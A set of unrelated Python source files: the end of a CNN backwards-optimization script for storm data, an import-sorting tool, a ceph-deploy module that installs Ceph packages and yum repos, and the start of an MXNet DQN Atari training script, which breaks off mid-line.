NUM_EXAMPLES_HELP_STRING = (
'Number of examples (storm objects) to read from `{0:s}`. If you want to '
'read all examples, make this non-positive.'
).format(STORM_METAFILE_ARG_NAME)
EXAMPLE_DIR_HELP_STRING = (
'[used only if `{0:s}` is empty] Name of top-level directory with dataset '
'examples. Files therein will be read by '
'`testing_io.read_predictors_specific_examples`, where the '
'"specific examples" correspond to the storm IDs and times specified in '
'`{1:s}`.'
).format(INIT_FUNCTION_ARG_NAME, STORM_METAFILE_ARG_NAME)
COMPONENT_HELP_STRING = (
'Determines model component for which activation will be maximized. See '
'`model_interpretation.check_component_metadata` for details.')
IDEAL_ACTIVATION_HELP_STRING = (
'[used only if {0:s} = "{1:s}" or "{2:s}"] See '
'`backwards_opt.optimize_input_for_neuron` or '
'`backwards_opt.optimize_input_for_channel` for details.'
).format(
COMPONENT_TYPE_ARG_NAME, NEURON_COMPONENT_TYPE_STRING,
CLASS_COMPONENT_TYPE_STRING
)
NUM_ITERATIONS_HELP_STRING = 'Number of iterations for backwards optimization.'
LEARNING_RATE_HELP_STRING = 'Learning rate for backwards optimization.'
L2_WEIGHT_HELP_STRING = (
'Weight for L2 regularization. This will penalize the difference between '
'the original and synthetic (optimized) input tensors. If you do not want '
'L2 regularization, leave this argument alone.')
RADAR_CONSTRAINT_WEIGHT_HELP_STRING = (
'Weight for radar constraints. Used only if the CNN was trained with '
'reduced 2-D radar data (created by column operations). Ensures that '
'column values are consistent (e.g., min reflectivity in layer cannot be > '
'max refl in same layer). If you do not want to enforce radar constraints,'
' leave this argument alone.')
MINMAX_CONSTRAINT_WEIGHT_HELP_STRING = (
'Weight for min-max constraints. Forces physical variables to have '
'realistic values. If you do not want to enforce min-max constraints, '
'leave this argument alone.')
OUTPUT_FILE_HELP_STRING = (
'Path to output file (will be written by '
'`backwards_opt.write_standard_file`).')
INPUT_ARG_PARSER = argparse.ArgumentParser()
INPUT_ARG_PARSER.add_argument(
'--' + MODEL_FILE_ARG_NAME, type=str, required=True,
help=MODEL_FILE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + INIT_FUNCTION_ARG_NAME, type=str, required=False, default='',
help=INIT_FUNCTION_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + STORM_METAFILE_ARG_NAME, type=str, required=False, default='',
help=STORM_METAFILE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NUM_EXAMPLES_ARG_NAME, type=int, required=False, default=-1,
help=NUM_EXAMPLES_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + EXAMPLE_DIR_ARG_NAME, type=str, required=False, default='',
help=EXAMPLE_DIR_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + COMPONENT_TYPE_ARG_NAME, type=str, required=True,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + TARGET_CLASS_ARG_NAME, type=int, required=False, default=-1,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + LAYER_NAME_ARG_NAME, type=str, required=False, default='',
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NEURON_INDICES_ARG_NAME, type=int, nargs='+', required=False,
default=[-1], help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + CHANNEL_INDEX_ARG_NAME, type=int, required=False, default=-1,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + IDEAL_ACTIVATION_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_IDEAL_ACTIVATION,
help=IDEAL_ACTIVATION_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NUM_ITERATIONS_ARG_NAME, type=int, required=False,
default=backwards_opt.DEFAULT_NUM_ITERATIONS,
help=NUM_ITERATIONS_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + LEARNING_RATE_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_LEARNING_RATE,
help=LEARNING_RATE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + L2_WEIGHT_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_L2_WEIGHT, help=L2_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + RADAR_CONSTRAINT_WEIGHT_ARG_NAME, type=float, required=False,
default=-1., help=RADAR_CONSTRAINT_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + MINMAX_CONSTRAINT_WEIGHT_ARG_NAME, type=float, required=False,
default=-1., help=MINMAX_CONSTRAINT_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + OUTPUT_FILE_ARG_NAME, type=str, required=True,
help=OUTPUT_FILE_HELP_STRING)
def _create_initializer(init_function_name, model_metadata_dict):
"""Creates initialization function.
:param init_function_name: See documentation at top of file.
:param model_metadata_dict: Dictionary returned by
`cnn.read_model_metadata`.
:return: init_function: Function (see below).
"""
backwards_opt.check_init_function(init_function_name)
training_option_dict = model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY]
used_minmax_norm = (
training_option_dict[trainval_io.NORMALIZATION_TYPE_KEY] ==
dl_utils.MINMAX_NORMALIZATION_TYPE_STRING
)
if init_function_name == backwards_opt.CONSTANT_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_constant_initializer(
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY])
/ 2
)
return backwards_opt.create_constant_initializer(0.)
if init_function_name == backwards_opt.UNIFORM_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_uniform_random_initializer(
min_value=training_option_dict[
trainval_io.MIN_NORMALIZED_VALUE_KEY],
max_value=training_option_dict[
trainval_io.MAX_NORMALIZED_VALUE_KEY]
)
return backwards_opt.create_uniform_random_initializer(
min_value=-3., max_value=3.)
if init_function_name == backwards_opt.GAUSSIAN_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_gaussian_initializer(
mean=
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY])
/ 2,
standard_deviation=
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY]) / 6
)
return backwards_opt.create_gaussian_initializer(
mean=0., standard_deviation=1.)
return backwards_opt.create_climo_initializer(
model_metadata_dict=model_metadata_dict)
def _run(model_file_name, init_function_name, storm_metafile_name, num_examples,
top_example_dir_name, component_type_string, target_class, layer_name,
neuron_indices, channel_index, num_iterations, ideal_activation,
learning_rate, l2_weight, radar_constraint_weight,
minmax_constraint_weight, output_file_name):
"""Runs backwards optimization on a trained CNN.
This is effectively the main method.
:param model_file_name: See documentation at top of file.
:param init_function_name: Same.
:param storm_metafile_name: Same.
:param num_examples: Same.
:param top_example_dir_name: Same.
:param component_type_string: Same.
:param target_class: Same.
:param layer_name: Same.
:param neuron_indices: Same.
:param channel_index: Same.
:param num_iterations: Same.
:param ideal_activation: Same.
:param learning_rate: Same.
:param l2_weight: Same.
:param radar_constraint_weight: Same.
:param minmax_constraint_weight: Same.
:param output_file_name: Same.
"""
if l2_weight <= 0:
l2_weight = None
if radar_constraint_weight <= 0:
radar_constraint_weight = None
if minmax_constraint_weight <= 0:
minmax_constraint_weight = None
if ideal_activation <= 0:
ideal_activation = None
if init_function_name in ['', 'None']:
init_function_name = None
model_interpretation.check_component_type(component_type_string)
model_metafile_name = '{0:s}/model_metadata.p'.format(
os.path.split(model_file_name)[0]
)
print('Reading model metadata from: "{0:s}"...'.format(model_metafile_name))
model_metadata_dict = cnn.read_model_metadata(model_metafile_name)
input_matrices = None
init_function = None
full_storm_id_strings = None
storm_times_unix_sec = None
sounding_pressure_matrix_pa = None
if init_function_name is None:
print('Reading storm metadata from: "{0:s}"...'.format(
storm_metafile_name))
full_storm_id_strings, storm_times_unix_sec = (
tracking_io.read_ids_and_times(storm_metafile_name)
)
if 0 < num_examples < len(full_storm_id_strings):
full_storm_id_strings = full_storm_id_strings[:num_examples]
storm_times_unix_sec = storm_times_unix_sec[:num_examples]
example_dict = testing_io.read_predictors_specific_examples(
top_example_dir_name=top_example_dir_name,
desired_full_id_strings=full_storm_id_strings,
desired_times_unix_sec=storm_times_unix_sec,
option_dict=model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY],
layer_operation_dicts=model_metadata_dict[cnn.LAYER_OPERATIONS_KEY]
)
print(SEPARATOR_STRING)
input_matrices = example_dict[testing_io.INPUT_MATRICES_KEY]
sounding_pressure_matrix_pa = example_dict[
testing_io.SOUNDING_PRESSURES_KEY]
num_examples = input_matrices[0].shape[0]
else:
num_examples = 1
init_function = _create_initializer(
init_function_name=init_function_name,
model_metadata_dict=model_metadata_dict)
print('Reading model from: "{0:s}"...'.format(model_file_name))
model_object = cnn.read_model(model_file_name)
output_matrices = None
initial_activations = numpy.full(num_examples, numpy.nan)
final_activations = numpy.full(num_examples, numpy.nan)
for i in range(num_examples):
if init_function_name is None:
this_init_arg = [a[[i], ...] for a in input_matrices]
else:
this_init_arg = init_function
if component_type_string == CLASS_COMPONENT_TYPE_STRING:
print((
'\nOptimizing {0:d}th of {1:d} images for target class {2:d}...'
).format(
i + 1, num_examples, target_class
))
this_result_dict = backwards_opt.optimize_input_for_class(
model_object=model_object, target_class=target_class,
init_function_or_matrices=this_init_arg,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
elif component_type_string == NEURON_COMPONENT_TYPE_STRING:
print((
'\nOptimizing {0:d}th of {1:d} images for neuron {2:s} in layer'
' "{3:s}"...'
).format(
i + 1, num_examples, str(neuron_indices), layer_name
))
this_result_dict = backwards_opt.optimize_input_for_neuron(
model_object=model_object, layer_name=layer_name,
neuron_indices=neuron_indices,
init_function_or_matrices=this_init_arg,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight, ideal_activation=ideal_activation,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
else:
print((
'\nOptimizing {0:d}th of {1:d} images for channel {2:d} in '
'layer "{3:s}"...'
).format(
i + 1, num_examples, channel_index, layer_name
))
this_result_dict = backwards_opt.optimize_input_for_channel(
model_object=model_object, layer_name=layer_name,
channel_index=channel_index,
init_function_or_matrices=this_init_arg,
stat_function_for_neuron_activations=K.max,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight, ideal_activation=ideal_activation,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
initial_activations[i] = this_result_dict[
backwards_opt.INITIAL_ACTIVATION_KEY]
final_activations[i] = this_result_dict[
backwards_opt.FINAL_ACTIVATION_KEY]
these_output_matrices = this_result_dict[
backwards_opt.NORM_OUTPUT_MATRICES_KEY]
if output_matrices is None:
output_matrices = [None] * len(these_output_matrices)
for k in range(len(output_matrices)):
if output_matrices[k] is None:
output_matrices[k] = these_output_matrices[k] + 0.
else:
output_matrices[k] = numpy.concatenate(
(output_matrices[k], these_output_matrices[k]), axis=0
)
if init_function_name is None:
continue
these_input_matrices = this_result_dict[
backwards_opt.NORM_INPUT_MATRICES_KEY]
if input_matrices is None:
input_matrices = [None] * len(these_input_matrices)
for k in range(len(input_matrices)):
if input_matrices[k] is None:
input_matrices[k] = these_input_matrices[k] + 0.
else:
input_matrices[k] = numpy.concatenate(
(input_matrices[k], these_input_matrices[k]), axis=0
)
print(SEPARATOR_STRING)
training_option_dict = model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY]
print('Denormalizing input examples...')
input_matrices = trainval_io.separate_shear_and_reflectivity(
list_of_input_matrices=input_matrices,
training_option_dict=training_option_dict)
input_matrices = model_interpretation.denormalize_data(
list_of_input_matrices=input_matrices,
model_metadata_dict=model_metadata_dict)
print('Denormalizing optimized examples...')
output_matrices = trainval_io.separate_shear_and_reflectivity(
list_of_input_matrices=output_matrices,
training_option_dict=training_option_dict)
output_matrices = model_interpretation.denormalize_data(
list_of_input_matrices=output_matrices,
model_metadata_dict=model_metadata_dict)
print('Writing results to: "{0:s}"...'.format(output_file_name))
bwo_metadata_dict = backwards_opt.check_metadata(
component_type_string=component_type_string,
num_iterations=num_iterations, learning_rate=learning_rate,
target_class=target_class, layer_name=layer_name,
ideal_activation=ideal_activation, neuron_indices=neuron_indices,
channel_index=channel_index, l2_weight=l2_weight,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight)
backwards_opt.write_standard_file(
pickle_file_name=output_file_name,
denorm_input_matrices=input_matrices,
denorm_output_matrices=output_matrices,
initial_activations=initial_activations,
final_activations=final_activations, model_file_name=model_file_name,
metadata_dict=bwo_metadata_dict,
full_storm_id_strings=full_storm_id_strings,
storm_times_unix_sec=storm_times_unix_sec,
sounding_pressure_matrix_pa=sounding_pressure_matrix_pa)
if __name__ == '__main__':
INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()
_run(
model_file_name=getattr(INPUT_ARG_OBJECT, MODEL_FILE_ARG_NAME),
init_function_name=getattr(
INPUT_ARG_OBJECT, INIT_FUNCTION_ARG_NAME),
storm_metafile_name=getattr(
INPUT_ARG_OBJECT, STORM_METAFILE_ARG_NAME),
num_examples=getattr(INPUT_ARG_OBJECT, NUM_EXAMPLES_ARG_NAME),
top_example_dir_name=getattr(
INPUT_ARG_OBJECT, EXAMPLE_DIR_ARG_NAME),
component_type_string=getattr(
INPUT_ARG_OBJECT, COMPONENT_TYPE_ARG_NAME),
target_class=getattr(INPUT_ARG_OBJECT, TARGET_CLASS_ARG_NAME),
layer_name=getattr(INPUT_ARG_OBJECT, LAYER_NAME_ARG_NAME),
neuron_indices=numpy.array(
getattr(INPUT_ARG_OBJECT, NEURON_INDICES_ARG_NAME), dtype=int),
channel_index=getattr(INPUT_ARG_OBJECT, CHANNEL_INDEX_ARG_NAME),
num_iterations=getattr(INPUT_ARG_OBJECT, NUM_ITERATIONS_ARG_NAME),
ideal_activation=getattr(
INPUT_ARG_OBJECT, IDEAL_ACTIVATION_ARG_NAME),
learning_rate=getattr(INPUT_ARG_OBJECT, LEARNING_RATE_ARG_NAME),
l2_weight=getattr(INPUT_ARG_OBJECT, L2_WEIGHT_ARG_NAME),
radar_constraint_weight=getattr(
INPUT_ARG_OBJECT, RADAR_CONSTRAINT_WEIGHT_ARG_NAME),
minmax_constraint_weight=getattr(
INPUT_ARG_OBJECT, MINMAX_CONSTRAINT_WEIGHT_ARG_NAME),
output_file_name=getattr(INPUT_ARG_OBJECT, OUTPUT_FILE_ARG_NAME)
)
|
# coding=utf-8
import os
import copy
import argparse
from import_sorter_libs import std_lib_modules
def parse_args():
"""Preparing & parsing arguments"""
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
'-A', '--all_files', type=bool, default=False, const=True, nargs='?',
help=u'Run script on all *.py files in current directory.')
parser.add_argument(
'-f', '--files', metavar='files', type=str, default='', nargs='+',
help=u'Run script on specified file.')
return parser.parse_args()
def get_file_imports(path):
imports = []
pos = 0
start_pos = None
last_import_position = 0
non_imports = []
try_block = []
with open(path, mode='r') as fts:
while True:
file_pos = fts.tell()
line = fts.readline()
if _is_import_line(line):
imports.append(line)
if start_pos is None:
start_pos = pos
last_import_position = pos
pos += 1
if line.split() and line.split()[0] in ['def', 'class']:
break
if file_pos == fts.tell():
break
if 'try:' in line:
try_block.append(line)
#pos += 1
while True:
line = fts.readline()
pos += 1
if line.strip() in ['except:', 'finally:'] or line.startswith(' '):
try_block.append(line)
else:
last_import_position = pos
break
return (imports, start_pos, last_import_position, try_block)
def _is_import_line(line):
if line.split() and not line.startswith(' '):
line_prefix = line.split()[0]
if line_prefix in ['import', 'from']:
return True
return False
def get_beautiful_imports(all_imports, non_imports, try_block):
std_imports = get_standard_imports(all_imports)
all_imports = list(set(all_imports) - set(std_imports))
local_imports = get_third_party_imports(all_imports)
third_party_imports = set(all_imports) - set(std_imports) - set(
local_imports)
ok_imports = get_import_the_right_way(std_imports, third_party_imports,
local_imports, non_imports, try_block)
return ok_imports
def get_from_and_import_separately(imports):
from_imports = []
import_imports = []
for import_ in imports:
if import_.split() and import_.split()[0] == 'from':
from_imports.append(import_)
else:
import_imports.append(import_)
import_imports.extend(from_imports)
return import_imports
def get_import_the_right_way(std_imports, third_party_imports, local_imports, non_imports, try_block):
std_imports = sorted(std_imports, key=len)
std_imports = get_from_and_import_separately(std_imports)
third_party_imports = sorted(third_party_imports, key=len)
third_party_imports = get_from_and_import_separately(third_party_imports)
local_imports = non_imports + sorted(local_imports, key=len) + try_block
local_imports = get_from_and_import_separately(local_imports)
if std_imports and (third_party_imports or local_imports):
std_imports.append('\n')
if third_party_imports and local_imports:
third_party_imports.append('\n')
return std_imports + third_party_imports + local_imports
def get_standard_imports(all_imports):
imports = []
for x in all_imports:
mod_name = get_module_name(x)
if mod_name in std_lib_modules:
imports.append(x.lstrip())
return imports
def get_third_party_imports(all_imports):
imports = []
ctm_imports = get_curent_dir_modules()
try:
ctm_imports.remove('modules')
except ValueError:
pass
for x in all_imports:
mod_name = get_module_name(x)
if mod_name in ctm_imports or 'security' in x:
imports.append(x.lstrip())
return imports
def get_module_name(mod_import):
import_separated = mod_import.split()
import_prefix = import_separated[0]
mod = import_separated[1]
if import_prefix == 'from':
if '.' in mod:
mod_name = mod.split('.')[0]
else:
mod_name = mod
else:
mod_name = mod
return mod_name
def get_curent_dir_modules():
a_dir = os.getcwd()
dir_mods = os.listdir('.')
modules = []
for mod in dir_mods:
if not os.path.isdir(mod) and len(mod.split('.')) == 2 and mod.split('.')[1] == 'py':
modules.append(mod.split('.')[0])
while True:
if '__init__.py' not in os.listdir(a_dir):
break
a_dir = '/'.join(os.getcwd().split('/')[:-1])
return modules + [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name)) and '.' not in name]
def get_files_to_sort(files=None, recursive=True):
if files:
return files
else:
path = os.getcwd()
result = [os.path.join(dp, f) for dp, dn, filenames in os.walk(path)
for f in filenames if os.path.splitext(f)[1] == '.py'
and '__' not in os.path.splitext(f)[0] and 'modules' not in dp]
return result
def get_non_imports(path, start_pos, end_pos):
non_imports = []
pos = 0
with open(path, mode='r') as fts:
while True:
file_pos = fts.tell()
line = fts.readline()
if pos == end_pos or (line.split() and line.split()[0] in ['def', 'class']):
break
if pos >= start_pos and _is_non_import(line):
non_imports.append(line)
pos += 1
return non_imports
def _is_non_import(line):
return (line.split()
and line.split()[0] not in ['import', 'from']
and '#' not in line
and line.strip() not in ['try:', 'except:', 'finally:']
and not (line.startswith('"""') or line.startswith("'''"))
)
def main():
nspace = parse_args()
files_to_sort = get_files_to_sort(nspace.files)
for file_path in files_to_sort:
imports_, start_pos, end_pos, try_block = get_file_imports(file_path)
non_imports = get_non_imports(file_path, start_pos, end_pos)
beautiful_imports = get_beautiful_imports(
imports_, non_imports, try_block)
with open(file_path, mode='r') as fts:
all_lines = fts.readlines()
with open(file_path, mode='w') as fts:
if beautiful_imports:
all_lines[start_pos:end_pos + 1] = beautiful_imports
fts.writelines(all_lines)
if __name__ == '__main__':
main()
"""
TODO:
Hight priority:
- multi-line imports with commas or brackets
- make sure std_lib modules list is complete
Low priority:
- expand file paths (e.g. ~/file to /home/user/file)
- option to collapse all imports from ... into one
- line length checking
- checking if two blank lines between class and last import
FIXED:
+ imports first, later from
FIX:
- webapp2_extras recognized as local module, but webapp2_extras.auth is ok (in
services/sync_service.py is recognized ok, but not in models/user.py)
- module cgi not recognized as std_lib module
- 'from testcase_534 import TestCase534' recognized as third party module
"""
|
from ceph_deploy.util import templates
from ceph_deploy.lib import remoto
from ceph_deploy.hosts.common import map_components
from ceph_deploy.util.paths import gpg
NON_SPLIT_PACKAGES = ['ceph-osd', 'ceph-mon', 'ceph-mds']
def rpm_dist(distro):
if distro.normalized_name in ['redhat', 'centos', 'scientific'] and distro.normalized_release.int_major >= 6:
return 'el' + distro.normalized_release.major
return 'el6'
def repository_url_part(distro):
"""
Historically everything CentOS, RHEL, and Scientific has been mapped to
`el6` urls, but as we are adding repositories for `rhel`, the URLs should
map correctly to, say, `rhel6` or `rhel7`.
This function looks into the `distro` object and determines the right url
part for the given distro, falling back to `el6` when all else fails.
Specifically to work around the issue of CentOS vs RHEL::
>>> import platform
>>> platform.linux_distribution()
('Red Hat Enterprise Linux Server', '7.0', 'Maipo')
"""
if distro.normalized_release.int_major >= 6:
if distro.normalized_name == 'redhat':
return 'rhel' + distro.normalized_release.major
if distro.normalized_name in ['centos', 'scientific']:
return 'el' + distro.normalized_release.major
return 'el6'
def install(distro, version_kind, version, adjust_repos, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
logger = distro.conn.logger
release = distro.release
machine = distro.machine_type
repo_part = repository_url_part(distro)
dist = rpm_dist(distro)
distro.packager.clean()
# Get EPEL installed before we continue:
if adjust_repos:
distro.packager.install('epel-release')
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.enable_yum_priority_obsoletes()
logger.warning('check_obsoletes has been enabled for Yum priorities plugin')
if version_kind in ['stable', 'testing']:
key = 'release'
else:
key = 'autobuild'
if adjust_repos:
if version_kind in ['stable', 'testing']:
distro.packager.add_repo_gpg_key(gpg.url(key))
if version_kind == 'stable':
url = 'https://download.ceph.com/rpm-{version}/{repo}/'.format(
version=version,
repo=repo_part,
)
elif version_kind == 'testing':
url = 'https://download.ceph.com/rpm-testing/{repo}/'.format(repo=repo_part)
remoto.process.run(
distro.conn,
[
'rpm',
'-Uvh',
'--replacepkgs',
'{url}noarch/ceph-release-1-0.{dist}.noarch.rpm'.format(url=url, dist=dist),
],
)
elif version_kind in ['dev', 'dev_commit']:
logger.info('skipping install of ceph-release package')
logger.info('repo file will be created manually')
mirror_install(
distro,
'http://gitbuilder.ceph.com/ceph-rpm-centos{release}-{machine}-basic/{sub}/{version}/'.format(
release=release.split(".", 1)[0],
machine=machine,
sub='ref' if version_kind == 'dev' else 'sha1',
version=version),
gpg.url(key),
adjust_repos=True,
extra_installs=False
)
else:
raise Exception('unrecognized version_kind %s' % version_kind)
# set the right priority
logger.warning('ensuring that /etc/yum.repos.d/ceph.repo contains a high priority')
distro.conn.remote_module.set_repo_priority(['Ceph', 'Ceph-noarch', 'ceph-source'])
logger.warning('altered ceph.repo priorities to contain: priority=1')
if packages:
distro.packager.install(packages)
def mirror_install(distro, repo_url, gpg_url, adjust_repos, extra_installs=True, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
repo_url = repo_url.strip('/') # Remove trailing slashes
distro.packager.clean()
if adjust_repos:
distro.packager.add_repo_gpg_key(gpg_url)
ceph_repo_content = templates.ceph_repo.format(
repo_url=repo_url,
gpg_url=gpg_url
)
distro.conn.remote_module.write_yum_repo(ceph_repo_content)
# set the right priority
if distro.packager.name == 'yum':
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.set_repo_priority(['Ceph', 'Ceph-noarch', 'ceph-source'])
distro.conn.logger.warning('altered ceph.repo priorities to contain: priority=1')
if extra_installs and packages:
distro.packager.install(packages)
def repo_install(distro, reponame, baseurl, gpgkey, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
logger = distro.conn.logger
# Get some defaults
name = kw.pop('name', '%s repo' % reponame)
enabled = kw.pop('enabled', 1)
gpgcheck = kw.pop('gpgcheck', 1)
install_ceph = kw.pop('install_ceph', False)
proxy = kw.pop('proxy', '') # will get ignored if empty
_type = 'repo-md'
baseurl = baseurl.strip('/') # Remove trailing slashes
distro.packager.clean()
if gpgkey:
distro.packager.add_repo_gpg_key(gpgkey)
repo_content = templates.custom_repo(
reponame=reponame,
name=name,
baseurl=baseurl,
enabled=enabled,
gpgcheck=gpgcheck,
_type=_type,
gpgkey=gpgkey,
proxy=proxy,
**kw
)
distro.conn.remote_module.write_yum_repo(
repo_content,
"%s.repo" % reponame
)
repo_path = '/etc/yum.repos.d/{reponame}.repo'.format(reponame=reponame)
# set the right priority
if kw.get('priority'):
if distro.packager.name == 'yum':
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.set_repo_priority([reponame], repo_path)
logger.warning('altered {reponame}.repo priorities to contain: priority=1'.format(
reponame=reponame)
)
# Some custom repos do not need to install ceph
if install_ceph and packages:
distro.packager.install(packages)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import mxnet.ndarray as nd
import numpy
from base import Base
from operators import *
from atari_game import AtariGame
from utils import get_numpy_rng, parse_ctx
import logging
import argparse
import sys
import time
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
mx.random.seed(100)
npy_rng = get_numpy_rng()
class DQNInitializer(mx.initializer.Xavier):
def _init_bias(self, _, arr):
arr[:] = .1
def main():
parser = argparse.ArgumentParser(description='Script to test the trained network on a game.')
parser.add_argument('-r', '--rom', required=False, type=str,
default=os.path.join('roms', 'breakout.bin'),
help='Path of the ROM File.')
parser.add_argument('-v', '--visualization', action='store_true',
help='Visualize the runs.')
parser.add_argument('--lr', required=False, type=float, default=0.01,
help='Learning rate of the AdaGrad optimizer')
parser.add_argument('--eps', required=False, type=float, default=0.01,
help='Eps of the AdaGrad optimizer')
parser.add_argument('--clip-gradient', required=False, type=float, default=None,
help='Clip threshold of the AdaGrad optimizer')
parser.add_argument('--double-q', action='store_true',
help='Use Double DQN only if specified')
parser.add_argument('--wd', required=False, type=float, default=0.0,
help='Weight of the L2 Regularizer')
parser.add_argument('-c', '--ctx', required=False, type=str, default='gpu',
help='Running Context. E.g `-c gpu` or `-c gpu1` or `-c cpu`')
parser.add_argument('-d', '--dir-path', required=False, type=str, default='',
help='Saving directory of model files.')
parser.add_argument('--start-eps', required=False, type=float, default=1.0,
help='Eps of the epsilon-greedy policy at the beginning')
parser.add_argument('--replay-start-size', required=False, type=int, default=50000,
help='The step that the training starts')
parser.add_argument('--kvstore-update-period', required=False, type=int, default=1,
help='The period that the worker updates the parameters from the sever')
parser.add_argument('--kv-type', required=False, type=str, default=None,
help='type of kvstore, default will not use kvstore, could also be dist_async')
parser.add_argument('--optimizer', required=False, type=str, default="adagrad",
help='type of optimizer')
args = parser.parse_args()
if args.dir_path == '':
rom_name = os.path.splitext(os.path.basename(args.rom))[0]
args.dir_path = 'dqn-%s-lr%g' % (rom_name, args.lr)
replay_start_size = args.replay_start_size
max_start_nullops = 30
replay_memory_size = 1000000
history_length = 4
rows = 84
cols = 84
ctx = parse_ctx(args.ctx)
q_ctx = mx.Context(*ctx[0])
game = AtariGame(rom_path=args.rom, resize_mode='scale', replay_start_size=replay_start_size,
resized_rows=rows, resized_cols=cols, max_null_op=max_start_nullops,
replay_memory_size=replay_memory_size, display_screen=args.visualization,
history_length=history_length)
##RUN NATURE
freeze_interval = 10000
epoch_num = 200
steps_per_epoch = 250000
update_interval = 4
discount = 0.99
eps_start = args.start_eps
eps_min = 0.1
eps_decay = (eps_start - eps_min) / 1000000
eps_curr = eps_start
freeze_interval /= update_interval
minibatch_size = 32
action_num = len(game.action_set)
data_shapes = {'data': (minibatch_size, history_length) + (rows, cols),
'dqn_action': (minibatch_size,), 'dqn_reward': (minibatch_size,)}
dqn_sym = dqn_sym_nature(action_num)
qnet = Base(data_shapes=data_shapes, sym_gen=dqn_sym, name='QNet',
initializer=DQNInitializer(factor_type="in"),
ctx=q_ctx)
target_qnet = qnet.copy(name="TargetQNet", ctx=q_ctx)
use_easgd = False
optimizer = mx.optimizer.create(name=args.optimizer, learning_rate=args.lr, eps=args.eps,
clip_gradient=args.clip_gradient,
rescale_grad=1.0, wd=args.wd)
updater = mx.optimizer.get_updater(optimizer)
qnet.print_stat()
target_qnet.print_stat()
# Begin Playing Game
training_steps = 0
total_steps = 0
for epoch in range(epoch_num):
# Run Epoch
steps_left = steps_per_epoch
episode = 0
epoch_reward = 0
start = time.time()
game.start()
while steps_left > 0:
# Running New Episode
episode += 1
episode_loss = 0.0
episode_q_value = 0.0
episode_update_step = 0
episode_action_step = 0
time_episode_start = time.time()
game.begin_episode(steps_left)
while not game.episode_terminate:
# 1. We need to choose a new action based on the current game status
if game.state_enabled and game.replay_memory.sample_enabled:
do_exploration = (npy_rng.rand() < eps_curr)
eps_curr = max(eps_curr - eps_decay, eps_min)
if do_exploration:
action = npy_rng.randint(action_num)
else:
# TODO Here we can in fact play multiple gaming instances simultaneously and make actions for each
# We can simply stack the current_state() of gaming instances and give prediction for all of them
# We need to wait after calling calc_score(.), which makes the program slow
# TODO Profiling the speed of this part!
current_state = game.current_state()
state = nd.array(current_state.reshape((1,) + current_state.shape),
